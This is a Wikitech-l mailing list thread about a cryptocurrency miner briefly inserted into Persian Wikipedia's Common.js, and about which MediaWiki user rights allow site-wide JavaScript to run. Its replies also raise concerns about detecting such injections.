It has always made me a little uneasy that there are wiki pages where JavaScript could potentially be injected into my page without my approval. To be honest if I had the option I would disable all site and user scripts for my account.
Has this sort of thing happened before? Can we be sure there isn't a gadget, interface page that has this sort of code lurking inside? Do we have any detection measures in place? Even if every edit to these pages is watched I suspect it would be very easy for the same attack to be done in a more sophisticated way e.g. disguising the code as a base64 image for example On Wed, 14 Mar 2018 at 07:42 Brian Wolff <bawo...@gmail.com> wrote: > On Wednesday, March 14, 2018, David Gerard <dger...@gmail.com> wrote: > > What ways are there to include user-edited JavaScript in a wiki page? > > > > I ask because someone put this revision in (which is now deleted): > > > > > > https://fa.wikipedia.org/w/index.php?title=%D9%85%D8%AF%DB%8C%D8%A7%D9%88%DB%8C%DA%A9%DB%8C:Common.js&diff=next&oldid=22367460&uselang=en > > > > You can't see it now, but it was someone including a JavaScript > > cryptocurrency miner in common.js! > > > > Obviously this is not going to be a common thing, and common.js is > > closely watched. (The above edit was reverted in 7 minutes, and the > > user banned.) > > > > But what are the ways to get user-edited JavaScript running on a > > MediaWiki, outside one's own personal usage? And what permissions are > > needed? I ask with threats like this in mind. > > > > > > - d. > > > > _______________________________________________ > > Wikitech-l mailing list > > Wikitech-l@lists.wikimedia.org > > https://lists.wikimedia.org/mailman/listinfo/wikitech-l > > You need editinterface, edituserjs, or some of the centralnotice related > rights (or the steward related rights to give yourself these rights). > > Any method that does not involve editinterface or a related right that is > normally restricted to administrator (or higher group) should be considered > a serious security issue in mediawiki and reported immediately. > > -- > Brian Wolff > _______________________________________________ > Wikitech-l mailing list > Wikitech-l@lists.wikimedia.org > https://lists.wikimedia.org/mailman/listinfo/wikitech-l _______________________________________________ Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
